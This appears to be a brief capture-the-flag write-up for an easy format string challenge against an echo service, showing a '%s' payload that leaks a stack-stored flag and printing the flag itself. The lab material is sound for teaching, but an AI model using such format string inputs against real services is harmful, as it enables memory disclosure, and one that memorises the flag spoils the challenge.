Difficulty: easy

Category: pwn

Author: xnull

Description:

### Format String Vulnerability

This program echoes back whatever you type. The flag is stored in memory on the stack.

Can you leak it using a format string vulnerability?

**Access:** Connect to the binary with `ncat --ssl [host] [port]` or use pwntools.

The web interface provides educational content and downloadable source code.

Solution

The service accepts format string arguments, we can just spam some %s and get the flag:

===== Echo Service =====
Enter text to echo: %s.%s.%s.%s.%s.%s
You entered: You entered: .(null).(null).%s.%s.%s.%s.%s.%s
.(null).ENDLM{bc006bcea480a4f90ac40d4b5e3ae904bb89eb0343cd5c14}

Flag: ENDLM{bc006bcea480a4f90ac40d4b5e3ae904bb89eb0343cd5c14}

Solution#

Solution